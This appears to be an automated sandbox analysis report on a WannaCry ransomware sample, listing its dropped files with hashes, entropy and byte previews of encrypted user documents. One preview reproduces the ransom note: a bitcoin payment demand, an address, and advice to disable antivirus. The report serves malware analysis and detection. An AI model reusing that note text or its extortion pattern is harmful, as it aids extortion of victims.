                                SHA-512:38DFE8349ADB39D3BC0A82FDCEB7CD57EA12A058CA88E32A1C93248FDD31D62B11F612791048181A0EE3B7797BA68F6D66D53CD2861C1C609F4CE5700F02CDAB
                                Malicious:false
                                Reputation:unknown
                                Preview:WANACRY!....beM....}.M..a....iu.L.K.*NLi.1.Y.p.^........h]..c...t..........x.h..;a\.....:*.l..:..b...L..~...h:..zO.<{YCK.|..H.`$..s.<....".`d*.....@KAc..g...\A......(.2.....f.....E|.Q..V......h..7u..K..S....f...f.../...d..]j....h.,Y..h.(.U.%..z D.....(O............%......t..W...`.:.z..yQs/V.....*.a..}...T..xN...[RF.,.L<@......j.l..x.B.fS..U.....#i.{*..v....9.j;.....D..(.$m.\PN..~.F.wQ*.~.iT....n.. .).... .......&Ex..Z(hPz...=)f..S=.....QY...{m.......ZJsU..../...%>(....CuiJ...I..?9..q=q..|+.A.+}.7..i.".....S...y^..q2Q.O..x..ky.R...]E.)Y....F.mg....a.......D...C..@I..h.(..#w.-k ..lB....17H..S. X?..(...LxsZ.OSV<o|.(;n.'..Q....y..........T..Z..a|J.....L..[;...(.FZn._b......\`.a~..f..-O.:.9..o...R......@..!...........t.........i!U.7}...p.C....T...._[..a..>C..w.z.C.5OvC.a...2...0.)....PO.r...."..1.M.Y.!?...0..Q....2......;k..>.C.t.g....;.b=.M...#... Y.r1.q3O\..g.>yx.2\$.0....-O(......Gz..m.....*$.....7nUlH..$0.lQ)...o.....5=u.P.....1..g..Z.~.

                                C:\Users\user\Documents\EEGWXUHVUG.jpg.WNCRYT

                                Download File
                                Process:C:\Users\user\Desktop\2N2jefqo8e.exe
                                File Type:data
                                Category:dropped
                                Size (bytes):1320
                                Entropy (8bit):7.843799295141846
                                Encrypted:false
                                SSDEEP:24:bkRXx+L8gHM25zoCFWSB15pCC+k+eXIOmL24MKTujDayP0Mo4jhb9:bkRhEX57FRnmC+kBXIOQN4ay8yVR
                                MD5:D7E53D0AE1F9854CD21BF18F8045DA00
                                SHA1:A64FD086D79CB1FA56138D132E9F59C6E1EA2F48
                                SHA-256:B4B07CF1D1AF2A6DA954180D33C31420ABAC5B70FA6301E4FFD33519FFE6AB27
                                SHA-512:38DFE8349ADB39D3BC0A82FDCEB7CD57EA12A058CA88E32A1C93248FDD31D62B11F612791048181A0EE3B7797BA68F6D66D53CD2861C1C609F4CE5700F02CDAB
                                Malicious:false
                                Reputation:unknown
                                Preview:WANACRY!....beM....}.M..a....iu.L.K.*NLi.1.Y.p.^........h]..c...t..........x.h..;a\.....:*.l..:..b...L..~...h:..zO.<{YCK.|..H.`$..s.<....".`d*.....@KAc..g...\A......(.2.....f.....E|.Q..V......h..7u..K..S....f...f.../...d..]j....h.,Y..h.(.U.%..z D.....(O............%......t..W...`.:.z..yQs/V.....*.a..}...T..xN...[RF.,.L<@......j.l..x.B.fS..U.....#i.{*..v....9.j;.....D..(.$m.\PN..~.F.wQ*.~.iT....n.. .).... .......&Ex..Z(hPz...=)f..S=.....QY...{m.......ZJsU..../...%>(....CuiJ...I..?9..q=q..|+.A.+}.7..i.".....S...y^..q2Q.O..x..ky.R...]E.)Y....F.mg....a.......D...C..@I..h.(..#w.-k ..lB....17H..S. X?..(...LxsZ.OSV<o|.(;n.'..Q....y..........T..Z..a|J.....L..[;...(.FZn._b......\`.a~..f..-O.:.9..o...R......@..!...........t.........i!U.7}...p.C....T...._[..a..>C..w.z.C.5OvC.a...2...0.)....PO.r...."..1.M.Y.!?...0..Q....2......;k..>.C.t.g....;.b=.M...#... Y.r1.q3O\..g.>yx.2\$.0....-O(......Gz..m.....*$.....7nUlH..$0.lQ)...o.....5=u.P.....1..g..Z.~.

                                C:\Users\user\Documents\EEGWXUHVUG.xlsx

                                Download File
                                Process:C:\Users\user\Desktop\2N2jefqo8e.exe
                                File Type:data
                                Category:dropped
                                Size (bytes):1026
                                Entropy (8bit):7.812510169906532
                                Encrypted:false
                                SSDEEP:24:iZNp63WGf00vopI0xqXho3jlNNyiAqwmEz1U69j6KKhtwc5pGTfFnKl:mmA06I0QhozFyi8mcKhiciY
                                MD5:2CAE604FC32C0B3BEA46A3D93E6B7563
                                SHA1:472DEE997DEE4E91646AD395194C3BE7702B0C84
                                SHA-256:551F003F0163425459367E6EAEF6CACDDACCB881A7F5A006450C4CB3D4956814
                                SHA-512:56BE5B0BEA246170D7FAF6FC8607A4D1399FFA0E0A39B0BEB871F43235C8D5FBFBA2C080590DBDF2661ABD2E85DA91FDECECDA4276073177FB249081E1520105
                                Malicious:false
                                Reputation:unknown
                                Preview:_h.\P.1o/......g......1]R.....*lF1f.qY.$".....w.......;......4......-..@r..`....[QT......`t..E../.nDQ....]...}. [..T.w..q.c.r...ozk.....^.^.l.r=...V.xB...q.T.y.}.I...@....\#G.r}6..Ox../...3.k.e......MB.sn.i.5....'....... p7.u......$...B..*...X.\...p ......Fp....*XO...g..0o.....L:j....rOT.....h...C>...G..)..6.u.K..F...Zr.h...;..2@A._V....Bk....u....a.1;.6N?:......X.kB....%.....2f.O.)...Zzl.+......6..{G.*&.. f.7^...m.P..q.."..~$PN.a.~....p..D_.]q....Ln.-.v.H.b.0..n=...._.<8..T_f.O.&^..Ad.....I.Z#hr.dG#.Y.....r.oOc..F...5<)..".93....U..e8.E8J......MR. ..w=.G.,dQ\........B.!.....x2b..J.....v.......6..H..+.I..e....Zr.A..9..2Q..B.l..p_b.q...e.y_.7BU0.r../F.g.S...e#0\I......_E.....c..&ha.D.9\..7GH..........-.%*I.To...\7..M..CN.._h..p&:;.a..-......n$a7s..r...X...Y..e....>.#1.........x....F.L..DUk......+.6.......U..m(%..r....6...I%...H-.........5............9...m...>z.1........p-..E.8.!........xZ..v.........n.f%.<...&.g.|..G..g..p...F......f.W.)...0.

                                C:\Users\user\Documents\EEGWXUHVUG.xlsx.WNCRY (copy)

                                Download File
                                Process:C:\Users\user\Desktop\2N2jefqo8e.exe
                                File Type:data
                                Category:dropped
                                Size (bytes):1320
                                Entropy (8bit):7.852053691475159
                                Encrypted:false
                                SSDEEP:24:bkJNLNfS2JZ2/0pCqM57sKdXMDClmUS3aEv8PWS+qqUwII9ZpF7pQx5DSI:bkTNqiZ2aC/57sY0CoUS3euSxqfIIRQt
                                MD5:639441D30692A96CE86EE5A4DF90D0D2
                                SHA1:0784C7E8EF1AF9FBED1634B2337DDC5F46B16D3C
                                SHA-256:D96D242E60ABCC88E6DB83E0A724C8F88629FAF5B270D43A933775B14A3A6FEE
                                SHA-512:EA4D0408BDA7CBA9E962AB457F00E388CAAE2B1147E0B8C0279E78AA0BF4EA208DD42FCBFD9F9DE85156C3A72C2B00E579910F4AFA89CF02097C2F429B862617
                                Malicious:false
                                Reputation:unknown
                                Preview:WANACRY!.....]..R...l..i.:WJ?.g...G..].%v...0..6_.t;f....R.<...m+~I.Y.~gc#L..".H(.B=. .R..].M:..&.3^../.7.9Fzx.L....uxs.@?...>)L.s.#..|....^3e.z.....5.S*.&..LG8R.l.k7F.4...`.1|..T.g.b.dC.B..f...W..nl}...(P...47.....`..mJ.,..`fc..Z..~..>....Kl..3.....Az.6.g5..............h.7Ha`.Y....j..3....Xe.V.4K...x...@r`.>.-.Q.........-.{.8.B`...."..1.f.M.+....F.@xx.0.nq.-L.1.x...<...A}...H~F.8.5VNts.(n.s...9.#..........|..X......s.Z...8-..zq@.jxD.0C...4...Hl.......~...wL.e.~......9..J..tu....$..i..<......T......V.8n..`.u!B...)z....7W..8.T.P.%.........D.6...=bi....#b...1.....zp..........>..z.....I.F..i,...k...\+V../L.L........^.%4>....U..y....S&...C....l$."_{.'.....!!.yO.".ze.......8a....Bt.i.....m1t..8..Hb3O.X...ZN}:....).<.........Kk...%.^.`....^..h.b.Z.=z.........`.B..M..A.7...N...3......;.....7J....'...P...5........F...^x.i....!....%.C.\....l..8J{....R....d?...a.\X.........$...Z...-g^.D...w\._...b1<#..T/./.s-....}..AF.fYm..{.-BC...fg...

                                C:\Users\user\Documents\EEGWXUHVUG.xlsx.WNCRYT

                                Download File
                                Process:C:\Users\user\Desktop\2N2jefqo8e.exe
                                File Type:data
                                Category:dropped
                                Size (bytes):1320
                                Entropy (8bit):7.852053691475159
                                Encrypted:false
                                SSDEEP:24:bkJNLNfS2JZ2/0pCqM57sKdXMDClmUS3aEv8PWS+qqUwII9ZpF7pQx5DSI:bkTNqiZ2aC/57sY0CoUS3euSxqfIIRQt
                                MD5:639441D30692A96CE86EE5A4DF90D0D2
                                SHA1:0784C7E8EF1AF9FBED1634B2337DDC5F46B16D3C
                                SHA-256:D96D242E60ABCC88E6DB83E0A724C8F88629FAF5B270D43A933775B14A3A6FEE
                                SHA-512:EA4D0408BDA7CBA9E962AB457F00E388CAAE2B1147E0B8C0279E78AA0BF4EA208DD42FCBFD9F9DE85156C3A72C2B00E579910F4AFA89CF02097C2F429B862617
                                Malicious:false
                                Reputation:unknown
                                Preview:WANACRY!.....]..R...l..i.:WJ?.g...G..].%v...0..6_.t;f....R.<...m+~I.Y.~gc#L..".H(.B=. .R..].M:..&.3^../.7.9Fzx.L....uxs.@?...>)L.s.#..|....^3e.z.....5.S*.&..LG8R.l.k7F.4...`.1|..T.g.b.dC.B..f...W..nl}...(P...47.....`..mJ.,..`fc..Z..~..>....Kl..3.....Az.6.g5..............h.7Ha`.Y....j..3....Xe.V.4K...x...@r`.>.-.Q.........-.{.8.B`...."..1.f.M.+....F.@xx.0.nq.-L.1.x...<...A}...H~F.8.5VNts.(n.s...9.#..........|..X......s.Z...8-..zq@.jxD.0C...4...Hl.......~...wL.e.~......9..J..tu....$..i..<......T......V.8n..`.u!B...)z....7W..8.T.P.%.........D.6...=bi....#b...1.....zp..........>..z.....I.F..i,...k...\+V../L.L........^.%4>....U..y....S&...C....l$."_{.'.....!!.yO.".ze.......8a....Bt.i.....m1t..8..Hb3O.X...ZN}:....).<.........Kk...%.^.`....^..h.b.Z.=z.........`.B..M..A.7...N...3......;.....7J....'...P...5........F...^x.i....!....%.C.\....l..8J{....R....d?...a.\X.........$...Z...-g^.D...w\._...b1<#..T/./.s-....}..AF.fYm..{.-BC...fg...

                                C:\Users\user\Documents\EEGWXUHVUG\@Please_Read_Me@.txt

                                Download File
                                Process:C:\Users\user\Desktop\2N2jefqo8e.exe
                                File Type:ASCII text, with CRLF line terminators
                                Category:dropped
                                Size (bytes):933
                                Entropy (8bit):4.708686542546707
                                Encrypted:false
                                SSDEEP:24:ptrPzDVR5Gi3OzGm0EigS1xbnrRQhbrW8PNAi0eEprY+Ai75wRZcet:DZD36W3yhvWmMo+S
                                MD5:F97D2E6F8D820DBD3B66F21137DE4F09
                                SHA1:596799B75B5D60AA9CD45646F68E9C0BD06DF252
                                SHA-256:0E5ECE918132A2B1A190906E74BECB8E4CED36EEC9F9D1C70F5DA72AC4C6B92A
                                SHA-512:EFDA21D83464A6A32FDEEF93152FFD32A648130754FDD3635F7FF61CC1664F7FC050900F0F871B0DDD3A3846222BF62AB5DF8EED42610A76BE66FFF5F7B4C4C0
                                Malicious:false
                                Reputation:unknown
                                Preview:Q: What's wrong with my files?....A: Ooops, your important files are encrypted. It means you will not be able to access them anymore until they are decrypted... If you follow our instructions, we guarantee that you can decrypt all your files quickly and safely!.. Let's start decrypting!....Q: What do I do?....A: First, you need to pay service fees for the decryption... Please send $300 worth of bitcoin to this bitcoin address: 115p7UMMngoj1pMvkpHijcRdfJNXj6LrLn.... Next, please find an application file named "@WanaDecryptor@.exe". It is the decrypt software... Run and follow the instructions! (You may need to disable your antivirus for a while.).. ..Q: How can I trust?....A: Don't worry about decryption... We will decrypt your files surely because nobody will trust us if we cheat users... ....* If you need our assistance, send a message by clicking <Contact Us> on the decryptor window....

                                C:\Users\user\Documents\EEGWXUHVUG\@WanaDecryptor@.exe.lnk

                                Download File
                                Process:C:\Users\user\Desktop\2N2jefqo8e.exe
                                File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Archive, ctime=Sat Dec 31 15:12:56 2022, mtime=Sat Dec 31 15:12:56 2022, atime=Fri May 12 01:22:56 2017, length=245760, window=hide
                                Category:dropped
                                Size (bytes):577
                                Entropy (8bit):5.168523111223376
                                Encrypted:false
                                SSDEEP:12:8HwpzYNbfMQMtUNgsJUoBjAuZoMEwJwU+GtwU+GlmCt:8L+Vcg0AuvE5nG2nGlm
                                MD5:D5ADA753FFB2696EFF2847209F1F5501
                                SHA1:6FF9F1D03DFB0A85CA9EB44E83E7C330AA1578AF
                                SHA-256:62BEC4FD603EFBB85E05335DF2F7EAB315E5A8310822901526F121B2FADC971C
                                SHA-512:7E6A028C69CF82986789CE9A4780B704220C9F7D0554B47FC329CA3A227380EBDEFB885635015F94C29917F071EEA462890E2CAE9A7E1322C4D673844672242C
                                Malicious:true
                                Reputation:unknown
                                Preview:L..................F.... ....{..5...{..5.......................................P.O. .:i.....+00.:...:..,.LB.)...A&...&.......`._.....Y.5....Y.5....t.2......J.. .@WANAD~1.EXE..X......?V..?V.......b........................@.W.a.n.a.D.e.c.r.y.p.t.o.r.@...e.x.e.......Z...............-.......Y...........0-.......C:\Users\user\Desktop\@WanaDecryptor@.exe......\.@.W.a.n.a.D.e.c.r.y.p.t.o.r.@...e.x.e.`.......X.......226533..............n4UB.. .|..o..,........P..#.....n4UB.. .|..o..,........P..#.E.......9...1SPS..mD..pH.H@..=x.....h....H......c-dSA....n.............

                                C:\Users\user\Documents\EEGWXUHVUG\BJZFPPWAPT.xlsx

                                Download File
                                Process:C:\Users\user\Desktop\2N2jefqo8e.exe
                                File Type:data
                                Category:dropped
                                Size (bytes):1026
                                Entropy (8bit):7.820779399481449
                                Encrypted:false
                                SSDEEP:24:gXj0xvUBbzYZXcxMN4e1GW6Ly1Fo4Jc/59OT2zGeXo:0G8XCsiGe1GWvFn459OTwXo
                                MD5:40C34DD28D81C72CD473D8DD3830E709
                                SHA1:DB1223BC6071DF290993F449C2C78BFB894FB0A1
                                SHA-256:B0959ED55C1291282EE4DE0F9447DD0882E6CF7AB5134E2D2690A90D116E9486
                                SHA-512:03B73A8BE5E816BB5F68936A323F32C5A53AB7FB3D572879056EE9F7C0D0104746C280B232BC9403BBDB47A5141CA54B5658848048E44F25B964D99457DCE733
                                Malicious:false
                                Reputation:unknown
                                Preview:...?..d..L?.<.M.gv...8.&.X.^/..;.NS...0s..>..c#.b.?#....C.'...rz..R.S1..A...k....r..b.#~|..P)..,....=..W.L...K..M.%'v...y1J..Sd..Q.c...|1.u........^.N60..c.,,.D...m{.52.`.L..d.....i....__0..."f`..*."d8...K.o,.i..8.:.....?].3.;..........e..O........[3......l./Ym....c...p.i.8?*.I....+.$.!..!.....-L..+T..}B..WNu.5...X.*.O.........Y).K X.>..5.....wQ0..5.B...a...FpeC.G..c.3&f.....mA...\....jM.{..B....9....z.=...ECOa4`.t...X.Q3hY..%.p..........S..I.}_.;@WP)._.......#..X-([.1.....#M./.....u.i%wD.4.......gy..>....u...A.v."...@e#..lY..#M.F.>.~(8..,...."O...........FZ]j...G.y .%...q./.M9..... _.........Yh..v.\.....<{./.0.^^...Z.....T.G.d.B.......l...6.MY.).....,....7.M.D..z..a......_.xp.......4..q.<.......$l........o.'..h.p..5........J'..B...z...:8..}"Jc.(.tB......?.H"..i......tm..x..VF.A.hV/[E..8.DtY.j&.$t@...8....K...8.f...c..._[..Wz...1G.}.A.9..r...Z..a.G..a..........O}...E...&..V/.......~...j....!..Ig.....G...f=.._.u._....{]n.;o.G2.N...

                                C:\Users\user\Documents\EEGWXUHVUG\BJZFPPWAPT.xlsx.WNCRY (copy)

                                Download File
                                Process:C:\Users\user\Desktop\2N2jefqo8e.exe
                                File Type:data
                                Category:dropped
                                Size (bytes):1320
                                Entropy (8bit):7.873070307496728
                                Encrypted:false
                                SSDEEP:24:bkHG62NMivs20z1+WuRhd+YwsGfDsYE+hmjimXM5EhyI7GINPuBpw7RG:bkHP2305uRhBwsG7DEvimXMan7GKufw0
                                MD5:FC79CE83DA9D138B4EA19A4D23B1D3A0
                                SHA1:ACCB828413E5ACCD5DF9D93E7F9F1CE632382AED
                                SHA-256:2CD529F3BF031C4769E7210F5EB04E60B8639087B70806C64F29757A8331B81F
                                SHA-512:EE3F37A90F88AB6EF37CBE852BEF50DD691ECF70D584DB967C79927A510D268E8140C389FF931A98FA0DCE571535C0AC25C3A298137E06750A9169CBA06CEDE1
                                Malicious:false
                                Reputation:unknown
                                Preview:WANACRY!.....)%....d.M...;..=H..=..o.....,I..b...Q....e.].......j...".`....[B=...R......i..Ta$.>_.7...U....t.Q..lv#@i.@.....QW...u..'. 1#$z.}.....C...N...e!..V......n....,(...3\...w..K._....~..l...^5.;.`b{.".>w.%....k....).?...)...l."..._.....C..X...c.D..................t6...%D.......8..8...Y.\.O.m}\.MI......+.y.=PT.`......O...e...&`.....&&^vi...o.c'....lJ@j.;.5.A.....p|.r...b.[.~(.".....n....Z....*q....-..?..a...HGT..\^..Cmty....x..U..k.P..J.3....c.Y.q.3....:...c.2|6..bo..]fXj.....#_...=.....#.tZ?3^.|z....f..=...`.Tu:..L.DN >r.n..+.5.......73&k.-'.l.[..L...e%&....MQ'/.......~.yR.WDFT..k|..{=....u.!.../.N..&..-2GI#.J5.....8....'....u?...../..<)...4...fU...u/R.O.9P...R).U.s......Qw.5.A.....z..W.._....Q....Nx...w... .x9.l.v.8..z...~..x.sT....,..g.c...O...s..Z,..).*..;.I...XC{>N...p..H\1.......o@$...2..........sG.[yD7u...S......a. ...q.e4.>.O..ZYb\S.D....C.....C....Fl[..zE.~.]K....Xg."..).=...f..s...W....\...LCe...\...J.w.g.8E......

                                C:\Users\user\Documents\EEGWXUHVUG\BJZFPPWAPT.xlsx.WNCRYT

                                Download File
                                Process:C:\Users\user\Desktop\2N2jefqo8e.exe
                                File Type:data
                                Category:dropped
                                Size (bytes):1320
                                Entropy (8bit):7.873070307496728
                                Encrypted:false
                                SSDEEP:24:bkHG62NMivs20z1+WuRhd+YwsGfDsYE+hmjimXM5EhyI7GINPuBpw7RG:bkHP2305uRhBwsG7DEvimXMan7GKufw0
                                MD5:FC79CE83DA9D138B4EA19A4D23B1D3A0
                                SHA1:ACCB828413E5ACCD5DF9D93E7F9F1CE632382AED
                                SHA-256:2CD529F3BF031C4769E7210F5EB04E60B8639087B70806C64F29757A8331B81F
                                SHA-512:EE3F37A90F88AB6EF37CBE852BEF50DD691ECF70D584DB967C79927A510D268E8140C389FF931A98FA0DCE571535C0AC25C3A298137E06750A9169CBA06CEDE1
                                Malicious:false
                                Reputation:unknown
                                Preview:WANACRY!.....)%....d.M...;..=H..=..o.....,I..b...Q....e.].......j...".`....[B=...R......i..Ta$.>_.7...U....t.Q..lv#@i.@.....QW...u..'. 1#$z.}.....C...N...e!..V......n....,(...3\...w..K._....~..l...^5.;.`b{.".>w.%....k....).?...)...l."..._.....C..X...c.D..................t6...%D.......8..8...Y.\.O.m}\.MI......+.y.=PT.`......O...e...&`.....&&^vi...o.c'....lJ@j.;.5.A.....p|.r...b.[.~(.".....n....Z....*q....-..?..a...HGT..\^..Cmty....x..U..k.P..J.3....c.Y.q.3....:...c.2|6..bo..]fXj.....#_...=.....#.tZ?3^.|z....f..=...`.Tu:..L.DN >r.n..+.5.......73&k.-'.l.[..L...e%&....MQ'/.......~.yR.WDFT..k|..{=....u.!.../.N..&..-2GI#.J5.....8....'....u?...../..<)...4...fU...u/R.O.9P...R).U.s......Qw.5.A.....z..W.._....Q....Nx...w... .x9.l.v.8..z...~..x.sT....,..g.c...O...s..Z,..).*..;.I...XC{>N...p..H\1.......o@$...2..........sG.[yD7u...S......a. ...q.e4.>.O..ZYb\S.D....C.....C....Fl[..zE.~.]K....Xg."..).=...f..s...W....\...LCe...\...J.w.g.8E......

                                C:\Users\user\Documents\EEGWXUHVUG\EEGWXUHVUG.docx

                                Download File
                                Process:C:\Users\user\Desktop\2N2jefqo8e.exe
                                File Type:data
                                Category:dropped
                                Size (bytes):1026
                                Entropy (8bit):7.803839159576599
                                Encrypted:false
                                SSDEEP:24:OXRanQgEW/eO/F24haW7NnxrTvdGflk45:+c1Ek7TVglk45
                                MD5:2714174E0D41631FFF1564FF2BD5908E
                                SHA1:F03CAFA4B3F625588D5DF6B52E2C4149B8C60304
                                SHA-256:DC646EFA561CCDF162414484FCB92A013D5C6C45F6DD19BF090367AFFB4A9C82
                                SHA-512:8893E1D7BCD2DBA65ACAC05FF45CD314469007D454B40EED5F824D3EF99CAC7FDC00ED94133CD90B857B3EC2B19C2F77E098F8FA303FD8836A6EFE849573030D
                                Malicious:false
                                Reputation:unknown
                                Preview:..........V.......{.........z.K.r....)eZ;...R......./.....xk.BL.c..=.G....8.hS.....@.h.....x..;.U...sU...V...........AX.~..#X`.".i..w.PS......#u..?...=..W.....X...aI.[6....H!e..e....p..9fc...K.8.%.s.=.NX...T.].P9...%6.!.:{.^..1..B..O....QP.<B..q....T.p>.J...... .......{..\.....reJ. .B..0..w6;...f..L8.......+..95.%...2^,2G...+.;V#.n..I.<..3`vlJ.X...V's..z(l.s.&.9..8..Lg..;T.Kpd...w.....^...Z.8.4.U.sMP.gh:R..f..j.;......`........j.|0.;.8.E..R....g.#..M...6I....S6G>}..........)...U..D....}2Z...\.0g..&...n+u|..{.lb.@.uM..0Ma....:ezo..e~9..E.h6..S....[....;..i@P.K.6E..../<..H~u...u...0..U|.'.4..6.@L.O.K`......I.+.DI..<.=B.I.R;z..'...*j#.....=.$>p....Y..~o.U.CAu...,l....0.3.n.Bk.J$8..u....o..d.^?.v.BhrT}+..d3 ..j[....aq.r.i...7...n.......l.0....F....PF.........h,.n.T.g........]..;h./...ygU..$2"....S..$...9.H.v.(3.D...IO.s..R.4.uv..c..D@c.....7...y........T=q.........qP..+..{....A..E.'...O.X....=\)..~...sx...1.xL./2V........>..E..rU..d..:..

                                C:\Users\user\Documents\EEGWXUHVUG\EEGWXUHVUG.docx.WNCRY (copy)

                                Download File
                                Process:C:\Users\user\Desktop\2N2jefqo8e.exe
                                File Type:data
                                Category:dropped
                                Size (bytes):1320
                                Entropy (8bit):7.8549389295795935
                                Encrypted:false
                                SSDEEP:24:bkAzSFir5kG/dQdqMyuj0HatzhJDkbr9ikj/27iaofuTYQPt:bkAzS8r5kmLC0Hat9Jg39ikz2WNfuTJ
                                MD5:0526E58D330F91D55AE7A50BB9FAC67B
                                SHA1:E787B91F3F9731C631CE990C225ABC67E8F2731D
                                SHA-256:BEA97B15A03131A29B9C19966ACC6555647CFCAF30CCCFD5627B550CD2F903AA
                                SHA-512:9E936C8CF0122E9C8EA36CFC3348AC8B880C3081424EF60D34E9C7C749BFE30C50F40DAAA45AA1FA0D141FAEDE856855078FB7064470A9733BB9970AA35BC215
                                Malicious:false
                                Reputation:unknown
                                Preview:WANACRY!....B......`f.?'.z%....i.....8.....D.<.%Z...d.{P..!..!...V.....mB..j..].L...k..&*.Z..........l.!.$+...K....%........i..I.,............q=.l....:u.=.."..[.<..................U.#.,s...k.J)5.......Y+..x.-.(p_..\..QM.......5../H.'.Bv!....wz..'..=.............~.c.m....$3.'..n........&..JZ^..$..kK.a....1M0....|.......K.xf=.....".......D.d..C.*.R6/........E.%...kg. 65...u...e.....A....<....n..g.%..2M.G^..e~.J.(....$..R~.H.(e.?.b,.......qIh{SV..t(..&....y..........'.as.a..?T?,..^t..K...M)..<.O...N............s]:.{D..q..N..V%>..6bq..1...T..e62..M.) ..y..J.]@...0....r".......,....j"JZ,.Y....k...]...f....~.e.)J...u..0%.m..P..}..K.C....H...G..~..R.Y.U..fa...;.Y.....h./......a.!...P.wf...0...y..L..$...7...sM.O='A&4......0Z. .og.oZ....k.B.$/l..,_|<.WS....(8...O...6tvjb.B.D.......Z..[.KE..h.x4...l..........o.^\..Fn.y....d.Q.....l...5...-Q...../p..CC~.&^X.qy.'.r6..S..T.....qB)...."G..kg4"!....A%^......,m|3.C....f....U8\"fy...h.5.EnQ~..?.?..

                                C:\Users\user\Documents\EEGWXUHVUG\EEGWXUHVUG.docx.WNCRYT

                                Download File
                                Process:C:\Users\user\Desktop\2N2jefqo8e.exe
                                File Type:data
                                Category:dropped
                                Size (bytes):1320
                                Entropy (8bit):7.8549389295795935
                                Encrypted:false
                                SSDEEP:24:bkAzSFir5kG/dQdqMyuj0HatzhJDkbr9ikj/27iaofuTYQPt:bkAzS8r5kmLC0Hat9Jg39ikz2WNfuTJ
                                MD5:0526E58D330F91D55AE7A50BB9FAC67B
                                SHA1:E787B91F3F9731C631CE990C225ABC67E8F2731D
                                SHA-256:BEA97B15A03131A29B9C19966ACC6555647CFCAF30CCCFD5627B550CD2F903AA
                                SHA-512:9E936C8CF0122E9C8EA36CFC3348AC8B880C3081424EF60D34E9C7C749BFE30C50F40DAAA45AA1FA0D141FAEDE856855078FB7064470A9733BB9970AA35BC215
                                Malicious:false
                                Reputation:unknown
                                Preview:WANACRY!....B......`f.?'.z%....i.....8.....D.<.%Z...d.{P..!..!...V.....mB..j..].L...k..&*.Z..........l.!.$+...K....%........i..I.,............q=.l....:u.=.."..[.<..................U.#.,s...k.J)5.......Y+..x.-.(p_..\..QM.......5../H.'.Bv!....wz..'..=.............~.c.m....$3.'..n........&..JZ^..$..kK.a....1M0....|.......K.xf=.....".......D.d..C.*.R6/........E.%...kg. 65...u...e.....A....<....n..g.%..2M.G^..e~.J.(....$..R~.H.(e.?.b,.......qIh{SV..t(..&....y..........'.as.a..?T?,..^t..K...M)..<.O...N............s]:.{D..q..N..V%>..6bq..1...T..e62..M.) ..y..J.]@...0....r".......,....j"JZ,.Y....k...]...f....~.e.)J...u..0%.m..P..}..K.C....H...G..~..R.Y.U..fa...;.Y.....h./......a.!...P.wf...0...y..L..$...7...sM.O='A&4......0Z. .og.oZ....k.B.$/l..,_|<.WS....(8...O...6tvjb.B.D.......Z..[.KE..h.x4...l..........o.^\..Fn.y....d.Q.....l...5...-Q...../p..CC~.&^X.qy.'.r6..S..T.....qB)...."G..kg4"!....A%^......,m|3.C....f....U8\"fy...h.5.EnQ~..?.?..

                                C:\Users\user\Documents\EEGWXUHVUG\GLTYDMDUST.mp3

                                Download File
                                Process:C:\Users\user\Desktop\2N2jefqo8e.exe
                                File Type:data
                                Category:dropped
                                Size (bytes):1026
                                Entropy (8bit):7.816974575934229
                                Encrypted:false
                                SSDEEP:24:ZJmBGAFzpnwj5id5X0BsVJrHa+j3Vt8uxXelyeCrDI0zS:ZJDuzpwiX86Jr6mz81T+cIS
                                MD5:C2D45E591B2BFB07DE3A63CFC11AE1EC
                                SHA1:09B378A13C3A9C37068E7AC5FF67BF4172C85F63
                                SHA-256:6E403983BE0D65B884610200B6D2024C38C668E92ECC3321D6167F0EB8EBD67C
                                SHA-512:06B2E34D1EE65298A9813F3440E80B9CB4B1703EF84576769D79DDDF05A6AFDFF9CC3121DD29AEEED3F5BBE28D4D60D88E64AB38478061F13E20498838E1F172
                                Malicious:false
                                Reputation:unknown
                                Preview:.........jW.x#.C..71_.....b....}..m...1d42...e...8..@`@...$..(.>.V.}3.v.w..?...A.!Ke.e.2.u~...G\]...._t..2....u....O .e..O$]1....?u..W..y.O.....{!....s..AI..ZfZ#.o.......(.GE...+19\..(..)..M+8".?...$.c...!.9.[.J.o.....1.]..n....[.Z.E/'"D32m.....B..$.t?.4o.&.l ..O.6$...<ig..~...,.of...s/./.......q....+Fv|..+...M......f.e..I.+..1..Jbb*.d...>.3c.!iW..JH....H....0p.K|,.R...=.^.....*5T.EN.&.E2.j.....h<..3 S...o"3+....t.._^|.5..s. .4S[.eV.`.2..........e6G-h..E........s.z..[.I....E...=...|.b(....T.M..9@..q..H5R.?if.........a..u.I.h.\.......H.[/(....l..I3]m./.tQ..P.={~~_.C......!.\Y..G 3......y.h..S.7.&...).h.)\F..~.rh.G.i}:(...ya.......l...,;.d:...e.z.GTi.b_.X......K.9@t..y..g..YL..\.].R%L!.......L......K...e.6.>.....UW..\..d..C)...lSD..t{...)!W~,?...j0..%.].....8....&v....S.$..`.4.R..j........`N.'2...D...YQc.......'...YhXxQ:......2.'j..c..v...].0I.....eP.5h....!63...$.Y..h...y;.x(...}...@.z....W.......i.M|D.h.a:F".q....l.....d<lL.....`....f....Qx.

                                C:\Users\user\Documents\EEGWXUHVUG\GLTYDMDUST.mp3.WNCRY (copy)

                                Download File
                                Process:C:\Users\user\Desktop\2N2jefqo8e.exe
                                File Type:data
                                Category:dropped
                                Size (bytes):1320
                                Entropy (8bit):7.847670724050078
                                Encrypted:false
                                SSDEEP:24:bkqUBw4gATrJXtKtkY2Syfm8B5MAY+1x52WmGBuibAi71hFWJ254TZYX54WfVJ11:bkprg8rJXoNyfm8B5YGwdYHb571bFmKn
                                MD5:083E308E3777D2F92481313C5BD26999
                                SHA1:979714B0E2E049F670382E7F90D58C842244F666
                                SHA-256:A296885AC57F854F6A8A9B959C1744714526F4DD8066D0C8ACE4DB4451A4A8C0
                                SHA-512:ED09D7D209929E3A67D5E389531A76032D54D4EB3FD8D3D4F728B9A9EB1BF00E0E166FFF52FFC4FA9B0F74312EB66DF088C13AD3CF3954353F8935222A2079C5
                                Malicious:false
                                Reputation:unknown
